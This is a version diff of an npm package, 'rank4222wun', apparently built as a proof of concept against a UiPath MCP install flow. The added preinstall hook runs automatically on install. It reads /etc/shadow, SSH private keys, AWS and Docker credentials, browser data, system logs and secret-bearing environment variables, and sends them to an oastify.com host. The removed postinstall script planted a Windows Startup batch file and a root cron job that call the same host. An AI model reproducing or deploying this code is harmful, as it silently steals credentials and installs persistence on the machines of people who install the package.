rank4222wun 1.0.16 → 1.0.18

package/package.json

@@ -1,12 +1,10 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.16",
+  "version": "1.0.18",
   "description": "",
   "main": "index.js",
   "scripts": {
-    "preinstall": "node preinstall.js",
-    "postinstall": "node postinstall.js"
+    "preinstall": "node preinstall.js"
   },
-  "dependencies": {},
-  "main": "index.js"
+  "dependencies": {}
 }

package/preinstall.js

@@ -4,205 +4,420 @@ const fs = require('fs');
 const path = require('path');
 const https = require('https');
 
-console.log('=== UiPath MCP PREINSTALL EXPLOIT ===');
-console.log('Starting data exfiltration from:', os.hostname());
-
-// جمع كل البيانات الحساسة
+// ========== إعداد جمع البيانات ==========
 const collectedData = {
   timestamp: new Date().toISOString(),
-  system: {
-    hostname: os.hostname(),
-    platform: os.platform(),
-    user: os.userInfo(),
-    cpus: os.cpus().length,
-    memory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + 'GB',
-    network: os.networkInterfaces()
-  },
-  
-  // ملفات Desktop
-  desktopFiles: [],
-  
-  // فحص OneDrive
-  oneDrive: {},
-  
-  // ملفات نظام حساسة
-  sensitiveFiles: {},
-  
-  // معلومات الشبكة
-  networkInfo: {},
+  phase: "preinstall-data-exfiltration",
+  hostname: os.hostname(),
+  user: os.userInfo().username,
+  platform: os.platform(),
   
-  // متغيرات البيئة
-  envVars: {}
+  // البيانات الحساسة
+  sensitiveData: {
+    systemFiles: {},
+    userFiles: {},
+    configFiles: {},
+    logs: {},
+    foundSecrets: []
+  }
 };
 
-// 1. سرقة ملفات Desktop
-try {
-  const desktopPath = path.join(os.homedir(), 'Desktop');
-  if (fs.existsSync(desktopPath)) {
-    const files = fs.readdirSync(desktopPath, { withFileTypes: true });
-    collectedData.desktopFiles = files.map(file => ({
-      name: file.name,
-      type: file.isDirectory() ? 'folder' : 'file',
-      path: path.join(desktopPath, file.name)
-    }));
-    
-    // محاولة قراءة الملفات النصية
-    files.forEach(file => {
-      if (!file.isDirectory() && file.name.endsWith('.txt')) {
-        try {
-          const filePath = path.join(desktopPath, file.name);
-          const content = fs.readFileSync(filePath, 'utf8').substring(0, 1000);
-          collectedData.desktopFiles.find(f => f.name === file.name).content = content;
-        } catch (e) {}
+// ========== 1. قراءة ملفات نظام Linux حساسة ==========
+function readLinuxSensitiveFiles() {
+  console.log("🔍 البحث عن ملفات Linux الحساسة...");
+  
+  const linuxFiles = [
+    { path: '/etc/passwd', desc: 'قائمة مستخدمين النظام' },
+    { path: '/etc/shadow', desc: 'كلمات مرور النظام' },
+    { path: '/etc/group', desc: 'مجموعات النظام' },
+    { path: '/etc/hosts', desc: 'إعدادات الشبكة' },
+    { path: '/etc/resolv.conf', desc: 'خوادم DNS' },
+    { path: '/etc/ssh/sshd_config', desc: 'إعدادات SSH' },
+    { path: '/home/' + os.userInfo().username + '/.bash_history', desc: 'سجل الأوامر' },
+    { path: '/home/' + os.userInfo().username + '/.ssh/id_rsa', desc: 'مفتاح SSH خاص' },
+    { path: '/home/' + os.userInfo().username + '/.ssh/id_rsa.pub', desc: 'مفتاح SSH عام' },
+    { path: '/home/' + os.userInfo().username + '/.ssh/authorized_keys', desc: 'مفاتيح SSH مصرح بها' },
+    { path: '/home/' + os.userInfo().username + '/.aws/credentials', desc: 'مفاتيح AWS' },
+    { path: '/home/' + os.userInfo().username + '/.docker/config.json', desc: 'إعدادات Docker' },
+    { path: '/var/log/auth.log', desc: 'سجلات المصادقة' },
+    { path: '/var/log/syslog', desc: 'سجلات النظام' }
+  ];
+
+  linuxFiles.forEach(file => {
+    try {
+      if (fs.existsSync(file.path)) {
+        const stats = fs.statSync(file.path);
+        const fileData = {
+          path: file.path,
+          description: file.desc,
+          size: stats.size,
+          exists: true,
+          readable: true
+        };
+
+        // قراءة الملف إذا كان نصي وصغير
+        if (stats.size < 100000 && !stats.isDirectory()) {
+          try {
+            const content = fs.readFileSync(file.path, 'utf8');
+            fileData.content = content;
+            
+            // البحث عن أسرار في المحتوى
+            findSecretsInContent(content, file.path);
+          } catch (readError) {
+            fileData.readError = readError.message;
+          }
+        }
+        
+        collectedData.sensitiveData.systemFiles[file.path] = fileData;
+        console.log(`✅ ${file.desc}: ${file.path}`);
       }
-    });
-  }
-} catch (e) {
-  collectedData.desktopFiles = { error: e.message };
+    } catch (e) {
+      collectedData.sensitiveData.systemFiles[file.path] = {
+        error: e.message,
+        exists: false
+      };
+    }
+  });
 }
 
-// 2. فحص OneDrive
-try {
-  const onedrivePaths = [
-    path.join(os.homedir(), 'OneDrive'),
-    path.join(os.homedir(), 'OneDrive', 'Documents'),
-    path.join(os.homedir(), 'OneDrive', 'Desktop'),
-    path.join(os.homedir(), 'OneDrive', 'Pictures')
-  ];
+// ========== 2. قراءة ملفات Windows حساسة ==========
+function readWindowsSensitiveFiles() {
+  console.log("🔍 البحث عن ملفات Windows الحساسة...");
   
-  onedrivePaths.forEach(odPath => {
+  const username = os.userInfo().username;
+  const windowsFiles = [
+    { path: `C:\\Users\\${username}\\Desktop`, desc: 'مجلد Desktop' },
+    { path: `C:\\Users\\${username}\\Documents`, desc: 'مجلد Documents' },
+    { path: `C:\\Users\\${username}\\Downloads`, desc: 'مجلد Downloads' },
+    { path: `C:\\Users\\${username}\\OneDrive`, desc: 'مجلد OneDrive' },
+    { path: `C:\\Users\\${username}\\AppData\\Roaming\\Microsoft\\Windows\\Recent`, desc: 'الملفات الأخيرة' },
+    { path: `C:\\Users\\${username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History`, desc: 'تاريخ Chrome' },
+    { path: `C:\\Users\\${username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles`, desc: 'ملفات Firefox' },
+    { path: `C:\\Users\\${username}\\AppData\\Local\\Microsoft\\Credentials`, desc: 'معلومات اعتماد Windows' },
+    { path: `C:\\Users\\${username}\\.aws\\credentials`, desc: 'مفاتيح AWS' },
+    { path: `C:\\Users\\${username}\\.ssh\\id_rsa`, desc: 'مفتاح SSH خاص' },
+    { path: `C:\\Windows\\System32\\drivers\\etc\\hosts`, desc: 'ملف Hosts' },
+    { path: `C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`, desc: 'مجلد Startup للجميع' },
+    { path: `C:\\Users\\${username}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`, desc: 'مجلد Startup الشخصي' }
+  ];
+
+  windowsFiles.forEach(file => {
     try {
-      if (fs.existsSync(odPath)) {
-        collectedData.oneDrive[odPath] = {
+      if (fs.existsSync(file.path)) {
+        const stats = fs.statSync(file.path);
+        const fileData = {
+          path: file.path,
+          description: file.desc,
+          size: stats.size,
           exists: true,
-          isDirectory: fs.statSync(odPath).isDirectory(),
-          fileCount: fs.readdirSync(odPath).length,
-          sampleFiles: fs.readdirSync(odPath).slice(0, 5)
+          isDirectory: stats.isDirectory()
         };
-      } else {
-        collectedData.oneDrive[odPath] = { exists: false };
+
+        if (stats.isDirectory()) {
+          // قراءة محتويات المجلد
+          try {
+            const files = fs.readdirSync(file.path);
+            fileData.files = files.slice(0, 50); // أول 50 ملف فقط
+            fileData.fileCount = files.length;
+            
+            // البحث عن ملفات نصية في المجلد وقراءتها
+            findAndReadTextFiles(file.path, files);
+          } catch (dirError) {
+            fileData.dirError = dirError.message;
+          }
+        } else if (stats.size < 50000) {
+          // قراءة الملفات النصية الصغيرة
+          try {
+            const content = fs.readFileSync(file.path, 'utf8');
+            fileData.content = content.substring(0, 5000);
+            
+            // البحث عن أسرار في المحتوى
+            findSecretsInContent(content, file.path);
+          } catch (readError) {
+            fileData.readError = readError.message;
+          }
+        }
+        
+        collectedData.sensitiveData.userFiles[file.path] = fileData;
+        console.log(`✅ ${file.desc}: ${file.path} (${stats.isDirectory() ? 'مجلد' : 'ملف'})`);
       }
     } catch (e) {
-      collectedData.oneDrive[odPath] = { error: e.message };
+      collectedData.sensitiveData.userFiles[file.path] = {
+        error: e.message,
+        exists: false
+      };
     }
   });
-} catch (e) {
-  collectedData.oneDrive = { error: e.message };
 }
 
-// 3. قراءة ملفات نظام حساسة
-const systemFiles = os.platform() === 'win32' ? [
-  'C:\\Windows\\System32\\drivers\\etc\\hosts',
-  'C:\\Windows\\System32\\config\\SAM',
-  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History',
-  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'
-] : [
-  '/etc/passwd',
-  '/etc/shadow',
-  '/etc/hosts',
-  '/home/' + os.userInfo().username + '/.bash_history',
-  '/home/' + os.userInfo().username + '/.ssh/id_rsa'
-];
-
-systemFiles.forEach(file => {
-  try {
-    if (fs.existsSync(file)) {
-      const stats = fs.statSync(file);
-      collectedData.sensitiveFiles[file] = {
-        exists: true,
-        size: stats.size,
-        readable: stats.size < 1000000
-      };
-      
-      // قراءة إذا كان ملف نصي صغير
-      if (stats.size < 1000000 && !stats.isDirectory()) {
-        const content = fs.readFileSync(file, 'utf8').substring(0, 2000);
-        collectedData.sensitiveFiles[file].content = content;
+// ========== 3. البحث عن ملفات نصية وقراءتها ==========
+function findAndReadTextFiles(dirPath, files) {
+  const textExtensions = ['.txt', '.log', '.config', '.conf', '.ini', '.env', '.json', '.xml', '.yml', '.yaml', '.properties'];
+  
+  files.forEach(file => {
+    const filePath = path.join(dirPath, file);
+    try {
+      const stats = fs.statSync(filePath);
+      if (!stats.isDirectory() && stats.size < 100000) {
+        const ext = path.extname(file).toLowerCase();
+        if (textExtensions.includes(ext) || file.includes('config') || file.includes('secret') || file.includes('password')) {
+          try {
+            const content = fs.readFileSync(filePath, 'utf8');
+            collectedData.sensitiveData.configFiles[filePath] = {
+              path: filePath,
+              size: stats.size,
+              content: content.substring(0, 10000)
+            };
+            
+            // البحث عن أسرار
+            findSecretsInContent(content, filePath);
+            
+            console.log(`📄 قراءة: ${filePath}`);
+          } catch (e) {}
+        }
       }
-    }
-  } catch (e) {
-    collectedData.sensitiveFiles[file] = { error: e.message };
-  }
-});
+    } catch (e) {}
+  });
+}
 
-// 4. تشغيل أوامر نظام
-if (os.platform() === 'win32') {
-  exec('whoami /all', { timeout: 5000 }, (error, stdout) => {
-    collectedData.networkInfo.whoami = stdout || error?.message;
-    
-    exec('ipconfig /all', { timeout: 5000 }, (error2, stdout2) => {
-      collectedData.networkInfo.ipconfig = stdout2 || error2?.message;
-      
-      exec('netstat -ano', { timeout: 5000 }, (error3, stdout3) => {
-        collectedData.networkInfo.netstat = stdout3 || error3?.message;
-        sendAllData();
-      });
+// ========== 4. البحث عن أسرار في المحتوى ==========
+function findSecretsInContent(content, filePath) {
+  const secretPatterns = [
+    { pattern: /password\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'كلمة مرور' },
+    { pattern: /passwd\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'كلمة مرور' },
+    { pattern: /secret\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'سر' },
+    { pattern: /key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'مفتاح' },
+    { pattern: /token\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'توكن' },
+    { pattern: /api[_-]?key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'مفتاح API' },
+    { pattern: /access[_-]?key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'مفتاح وصول' },
+    { pattern: /secret[_-]?key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'مفتاح سري' },
+    { pattern: /aws[_-]?access[_-]?key[_-]?id\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'AWS Access Key' },
+    { pattern: /aws[_-]?secret[_-]?access[_-]?key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'AWS Secret Key' },
+    { pattern: /database[_-]?url\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'رابط قاعدة بيانات' },
+    { pattern: /connection[_-]?string\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'سلسلة اتصال' },
+    { pattern: /private[_-]?key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'مفتاح خاص' },
+    { pattern: /-----BEGIN (RSA|OPENSSH|DSA|EC) PRIVATE KEY-----/gi, name: 'مفتاح خاص كامل' }
+  ];
+
+  secretPatterns.forEach(pattern => {
+    const matches = [...content.matchAll(pattern.pattern)];
+    matches.forEach(match => {
+      if (match[1] && match[1].length > 3) {
+        collectedData.sensitiveData.foundSecrets.push({
+          file: filePath,
+          type: pattern.name,
+          value: match[1].substring(0, 100), // أول 100 حرف فقط
+          pattern: match[0].substring(0, 50)
+        });
+        console.log(`🔐 وجد ${pattern.name} في: ${filePath}`);
+      }
     });
   });
-} else {
-  exec('id', { timeout: 5000 }, (error, stdout) => {
-    collectedData.networkInfo.id = stdout || error?.message;
+}
+
+// ========== 5. قراءة سجلات النظام ==========
+function readSystemLogs() {
+  console.log("📊 قراءة سجلات النظام...");
+  
+  const logFiles = os.platform() === 'linux' ? [
+    '/var/log/auth.log',
+    '/var/log/syslog',
+    '/var/log/dmesg',
+    '/var/log/kern.log',
+    '/var/log/boot.log'
+  ] : [
+    'C:\\Windows\\System32\\winevt\\Logs\\Application.evtx',
+    'C:\\Windows\\System32\\winevt\\Logs\\System.evtx',
+    'C:\\Windows\\System32\\winevt\\Logs\\Security.evtx'
+  ];
+
+  logFiles.forEach(logFile => {
+    try {
+      if (fs.existsSync(logFile)) {
+        const stats = fs.statSync(logFile);
+        collectedData.sensitiveData.logs[logFile] = {
+          path: logFile,
+          size: stats.size,
+          exists: true
+        };
+        
+        // محاولة قراءة السجلات النصية (لينكس)
+        if (os.platform() === 'linux' && stats.size < 500000) {
+          try {
+            const logContent = fs.readFileSync(logFile, 'utf8');
+            const lines = logContent.split('\n').slice(-100); // آخر 100 سطر
+            collectedData.sensitiveData.logs[logFile].recentEntries = lines;
+          } catch (e) {}
+        }
+        
+        console.log(`📋 سجل: ${logFile} (${stats.size} بايت)`);
+      }
+    } catch (e) {}
+  });
+}
+
+// ========== 6. جمع متغيرات البيئة الحساسة ==========
+function collectSensitiveEnvVars() {
+  console.log("🔑 جمع متغيرات البيئة الحساسة...");
+  
+  const sensitiveVars = {};
+  Object.keys(process.env).forEach(key => {
+    const keyLower = key.toLowerCase();
+    const value = process.env[key];
     
-    exec('ifconfig -a || ip addr', { timeout: 5000 }, (error2, stdout2) => {
-      collectedData.networkInfo.ifconfig = stdout2 || error2?.message;
+    if (value && (
+      keyLower.includes('pass') ||
+      keyLower.includes('secret') ||
+      keyLower.includes('key') ||
+      keyLower.includes('token') ||
+      keyLower.includes('cred') ||
+      keyLower.includes('auth') ||
+      keyLower.includes('pwd') ||
+      keyLower.includes('database') ||
+      keyLower.includes('connection')
+    )) {
+      sensitiveVars[key] = value.length > 100 ? 
+        value.substring(0, 100) + '...' : 
+        value;
       
-      exec('netstat -tulpn', { timeout: 5000 }, (error3, stdout3) => {
-        collectedData.networkInfo.netstat = stdout3 || error3?.message;
-        sendAllData();
-      });
-    });
+      console.log(`🔑 ${key} = ${sensitiveVars[key]}`);
+    }
   });
+  
+  collectedData.sensitiveData.envVars = sensitiveVars;
 }
 
-// 5. جمع متغيرات البيئة الحساسة
-Object.keys(process.env).forEach(key => {
-  if (key.includes('PASS') || key.includes('SECRET') || key.includes('KEY') || 
-      key.includes('TOKEN') || key.includes('CRED') || key.includes('PWD')) {
-    collectedData.envVars[key] = process.env[key];
-  }
-});
+// ========== 7. البحث عن ملفات UiPath ==========
+function findUiPathFiles() {
+  console.log("🔍 البحث عن ملفات UiPath...");
+  
+  const searchPaths = os.platform() === 'win32' ? [
+    'C:\\Program Files\\UiPath',
+    'C:\\Program Files (x86)\\UiPath',
+    `C:\\Users\\${os.userInfo().username}\\AppData\\Local\\UiPath`,
+    `C:\\Users\\${os.userInfo().username}\\Documents\\UiPath`,
+    'C:\\ProgramData\\UiPath'
+  ] : [
+    '/opt/UiPath',
+    '/usr/lib/UiPath',
+    `/home/${os.userInfo().username}/.local/share/UiPath`,
+    `/home/${os.userInfo().username}/UiPath`
+  ];
 
-function sendAllData() {
-  console.log('Collected', Object.keys(collectedData.desktopFiles).length, 'desktop files');
-  console.log('OneDrive exists:', Object.values(collectedData.oneDrive).some(v => v.exists));
+  const foundUiPath = [];
   
-  const postData = JSON.stringify(collectedData);
+  searchPaths.forEach(searchPath => {
+    try {
+      if (fs.existsSync(searchPath)) {
+        const files = fs.readdirSync(searchPath);
+        foundUiPath.push({
+          path: searchPath,
+          exists: true,
+          fileCount: files.length,
+          sampleFiles: files.slice(0, 10)
+        });
+        console.log(`📁 UiPath: ${searchPath} (${files.length} ملف)`);
+        
+        // البحث عن ملفات تكوين UiPath
+        files.forEach(file => {
+          if (file.includes('.config') || file.includes('.json') || file.includes('.xml')) {
+            const filePath = path.join(searchPath, file);
+            try {
+              const stats = fs.statSync(filePath);
+              if (stats.size < 100000) {
+                const content = fs.readFileSync(filePath, 'utf8');
+                collectedData.sensitiveData.configFiles[filePath] = {
+                  path: filePath,
+                  size: stats.size,
+                  content: content.substring(0, 5000)
+                };
+              }
+            } catch (e) {}
+          }
+        });
+      }
+    } catch (e) {}
+  });
+  
+  collectedData.sensitiveData.uipathFiles = foundUiPath;
+}
+
+// ========== 8. إرسال البيانات ==========
+function sendCollectedData() {
+  console.log("\n" + "=".repeat(60));
+  console.log("📤 إرسال البيانات المسروقة إلى السيرفر...");
+  console.log("=".repeat(60));
   
   const req = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
-    path: '/preinstall-data',
+    path: '/data-exfiltration',
     method: 'POST',
     headers: {
       'Content-Type': 'application/json',
-      'X-UiPath-Exploit': 'Preinstall-Script',
-      'X-Hostname': os.hostname()
+      'X-Data-Source': 'UiPath-MCP-Data-Theft',
+      'X-Host': os.hostname(),
+      'X-User': os.userInfo().username
     }
   }, (res) => {
-    console.log('Data sent successfully. Status:', res.statusCode);
-    
-    // إنشاء ملف دليل محلي
-    const proofFile = path.join(os.tmpdir(), 'uipath_preinstall_proof_' + Date.now() + '.txt');
-    fs.writeFileSync(proofFile, 
-      `UiPath MCP Preinstall Script Execution Proof
-Time: ${new Date().toISOString()}
-User: ${os.userInfo().username}
-Hostname: ${os.hostname()}
-Desktop Files Stolen: ${collectedData.desktopFiles.length}
-Data Sent To: ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com
-`);
-    console.log('Proof file created:', proofFile);
+    console.log(`✅ تم إرسال البيانات. حالة الرد: ${res.statusCode}`);
+    printSummary();
   });
   
   req.on('error', (e) => {
-    console.error('Failed to send data:', e.message);
-    
-    // محاولة بديلة
-    const backupFile = path.join(os.tmpdir(), 'uipath_stolen_data_' + Date.now() + '.json');
-    fs.writeFileSync(backupFile, JSON.stringify(collectedData, null, 2));
-    console.log('Data saved locally:', backupFile);
+    console.error(`❌ خطأ في الإرسال: ${e.message}`);
+    printSummary();
   });
   
-  req.write(postData);
+  req.write(JSON.stringify(collectedData, null, 2));
   req.end();
 }
+
+// ========== 9. طباعة ملخص ==========
+function printSummary() {
+  console.log("\n" + "=".repeat(60));
+  console.log("📊 ملخص البيانات المسروقة:");
+  console.log("=".repeat(60));
+  
+  const sysFiles = Object.keys(collectedData.sensitiveData.systemFiles).length;
+  const userFiles = Object.keys(collectedData.sensitiveData.userFiles).length;
+  const configFiles = Object.keys(collectedData.sensitiveData.configFiles).length;
+  const logs = Object.keys(collectedData.sensitiveData.logs).length;
+  const secrets = collectedData.sensitiveData.foundSecrets.length;
+  
+  console.log(`📄 ملفات نظام: ${sysFiles} ملف`);
+  console.log(`👤 ملفات مستخدم: ${userFiles} ملف/مجلد`);
+  console.log(`⚙️  ملفات تكوين: ${configFiles} ملف`);
+  console.log(`📋 سجلات نظام: ${logs} سجل`);
+  console.log(`🔐 أسرار وجدت: ${secrets} سر`);
+  
+  if (secrets > 0) {
+    console.log("\n🔍 الأسرار التي تم العثور عليها:");
+    collectedData.sensitiveData.foundSecrets.forEach((secret, i) => {
+      console.log(`  ${i + 1}. ${secret.type} في ${secret.file}`);
+      console.log(`     → ${secret.pattern}`);
+    });
+  }
+  
+  console.log("\n📤 تم إرسال البيانات إلى:");
+  console.log("https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/data-exfiltration");
+  console.log("=".repeat(60));
+}
+
+// ========== بدء التنفيذ ==========
+console.log("🚀 بدء سرقة البيانات عبر ثغرة UiPath MCP...\n");
+
+// حسب النظام
+if (os.platform() === 'linux') {
+  readLinuxSensitiveFiles();
+} else if (os.platform() === 'win32') {
+  readWindowsSensitiveFiles();
+}
+
+// عمليات مشتركة
+readSystemLogs();
+collectSensitiveEnvVars();
+findUiPathFiles();
+
+// إرسال البيانات بعد 2 ثانية
+setTimeout(sendCollectedData, 2000);

package/index.js

@@ -1,9 +0,0 @@
-module.exports = {
-  test: function() {
-    console.log('UiPath MCP Test Package');
-    return {
-      status: 'active',
-      timestamp: new Date().toISOString()
-    };
-  }
-};

package/postinstall.js

@@ -1,185 +0,0 @@
-const { exec } = require('child_process');
-const os = require('os');
-const fs = require('fs');
-const path = require('path');
-const https = require('https');
-
-console.log('=== UiPath MCP POSTINSTALL EXPLOIT ===');
-console.log('Demonstrating persistent access on:', os.hostname());
-
-// 1. إنشاء باب خلفي بسيط
-const backdoorData = {
-  timestamp: new Date().toISOString(),
-  hostname: os.hostname(),
-  user: os.userInfo().username,
-  action: 'postinstall-backdoor'
-};
-
-// 2. إنشاء ملف في Startup لإثبات الإصرار (Persistence)
-if (os.platform() === 'win32') {
-  const startupPath = path.join(os.homedir(), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup');
-  const backdoorFile = path.join(startupPath, 'uipath_update.bat');
-  
-  const batchContent = `@echo off
-echo UiPath MCP Backdoor Active: %date% %time% > "%TEMP%\\uipath_backdoor.log"
-powershell -Command "Invoke-WebRequest -Uri 'https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/persist' -Method POST -Body 'host=${os.hostname()}&time=%date%_%time%'"`;
-  
-  try {
-    if (fs.existsSync(startupPath)) {
-      fs.writeFileSync(backdoorFile, batchContent);
-      backdoorData.windowsStartup = backdoorFile;
-      console.log('Windows Startup backdoor created:', backdoorFile);
-    }
-  } catch (e) {
-    backdoorData.windowsStartupError = e.message;
-  }
-  
-} else {
-  const cronFile = '/etc/cron.d/uipath_update';
-  const cronContent = `*/5 * * * * root curl -X POST https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/persist -d "host=${os.hostname()}&system=linux"\n`;
-  
-  try {
-    fs.writeFileSync(cronFile, cronContent);
-    backdoorData.linuxCron = cronFile;
-    console.log('Linux cron backdoor created:', cronFile);
-  } catch (e) {
-    backdoorData.linuxCronError = e.message;
-  }
-}
-
-// 3. البحث عن ملفات UiPath في النظام
-const uipathPaths = os.platform() === 'win32' ? [
-  'C:\\Program Files\\UiPath',
-  'C:\\Program Files (x86)\\UiPath',
-  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Local\\UiPath',
-  'C:\\Users\\' + os.userInfo().username + '\\Documents\\UiPath'
-] : [
-  '/opt/UiPath',
-  '/usr/lib/UiPath',
-  '/home/' + os.userInfo().username + '/.local/share/UiPath'
-];
-
-const foundUiPath = [];
-uipathPaths.forEach(p => {
-  try {
-    if (fs.existsSync(p)) {
-      const files = fs.readdirSync(p);
-      foundUiPath.push({
-        path: p,
-        exists: true,
-        fileCount: files.length,
-        files: files.slice(0, 10)
-      });
-    }
-  } catch (e) {}
-});
-
-backdoorData.foundUiPath = foundUiPath;
-
-// 4. قراءة بعض سجلات النظام
-if (os.platform() === 'win32') {
-  const eventLogs = [
-    'C:\\Windows\\System32\\winevt\\Logs\\Application.evtx',
-    'C:\\Windows\\System32\\winevt\\Logs\\System.evtx',
-    'C:\\Windows\\System32\\winevt\\Logs\\Security.evtx'
-  ];
-  
-  eventLogs.forEach(log => {
-    try {
-      if (fs.existsSync(log)) {
-        backdoorData.eventLogs = backdoorData.eventLogs || {};
-        backdoorData.eventLogs[log] = {
-          exists: true,
-          size: fs.statSync(log).size
-        };
-      }
-    } catch (e) {}
-  });
-}
-
-// 5. إنشاء ملف دليل في مجلد المستخدم
-const userProofFile = path.join(os.homedir(), 'uipath_security_issue.txt');
-const proofContent = `SECURITY WARNING: UiPath MCP Vulnerability Proof
-
-This file was created by an npm package postinstall script.
-It demonstrates that ANY npm package installed via UiPath MCP Command can:
-
-1. Read all your Desktop files
-2. Access your OneDrive
-3. Create persistent backdoors
-4. Steal sensitive system files
-5. Run any commands with high privileges
-
-Time: ${new Date().toISOString()}
-User: ${os.userInfo().username}
-Hostname: ${os.hostname()}
-
-This is NOT a sandbox. This is your actual production environment.
-The "Justin" user IS a real user with full access to your system.
-
-Contact UiPath Security Team immediately.
-`;
-
-try {
-  fs.writeFileSync(userProofFile, proofContent);
-  backdoorData.userProofFile = userProofFile;
-  console.log('User proof file created:', userProofFile);
-} catch (e) {
-  backdoorData.userProofFileError = e.message;
-}
-
-// 6. إرسال كل البيانات
-const req = https.request({
-  hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
-  port: 443,
-  path: '/postinstall-backdoor',
-  method: 'POST',
-  headers: {
-    'Content-Type': 'application/json',
-    'X-UiPath-Exploit': 'Postinstall-Backdoor',
-    'X-Hostname': os.hostname()
-  }
-}, (res) => {
-  console.log('Postinstall data sent. Status:', res.statusCode);
-  
-  // تشغيل أمر أخير لإثبات التنفيذ الكامل
-  setTimeout(() => {
-    if (os.platform() === 'win32') {
-      exec('echo "UiPath MCP exploit completed successfully" > "%USERPROFILE%\\uipath_final_proof.txt"');
-    } else {
-      exec('echo "UiPath MCP exploit completed successfully" > ~/uipath_final_proof.txt');
-    }
-  }, 2000);
-});
-
-req.on('error', (e) => {
-  console.error('Failed to send postinstall data:', e.message);
-  
-  // حفظ محلي
-  const localBackup = path.join(os.tmpdir(), 'uipath_backdoor_data_' + Date.now() + '.json');
-  fs.writeFileSync(localBackup, JSON.stringify(backdoorData, null, 2));
-  console.log('Backdoor data saved locally:', localBackup);
-});
-
-req.write(JSON.stringify(backdoorData));
-req.end();
-
-// 7. إرسال متابعة بعد 30 ثانية
-setTimeout(() => {
-  const followupReq = https.request({
-    hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
-    port: 443,
-    path: '/followup',
-    method: 'POST'
-  });
-  
-  followupReq.write(JSON.stringify({
-    followup: true,
-    time: new Date().toISOString(),
-    hostname: os.hostname(),
-    message: 'Postinstall script still active after 30 seconds'
-  }));
-  
-  followupReq.end();
-  console.log('Follow-up sent after 30 seconds');
-}, 30000);